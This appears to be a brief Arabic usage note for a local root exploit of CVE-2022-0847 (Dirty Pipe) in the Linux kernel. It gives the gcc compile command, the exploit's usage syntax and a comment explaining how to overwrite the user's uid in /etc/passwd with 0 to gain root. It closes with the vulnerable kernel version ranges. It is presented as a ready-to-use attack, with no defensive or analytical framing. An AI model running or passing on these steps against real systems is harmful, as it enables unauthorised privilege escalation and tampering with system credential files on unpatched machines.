
استغلال الجذر لـ CVE-2022-0847 (Dirty Pipe)
gcc exploit.c -o exploit -std=c99
#
./exploit
Usage: ./exp TARGETFILE OFFSET DATA
# ابحث عن إزاحة uid للمستخدم العادي في ملف /etc/passwd، وقم بتعديل uid إلى 0، ثم أعد تسجيل الدخول للحصول على صلاحيات root
نطاق التأثير
إصدار Linux Kernel >= 5.8
إصدار Linux Kernel < 5.16.11 / 5.15.25 / 5.10.102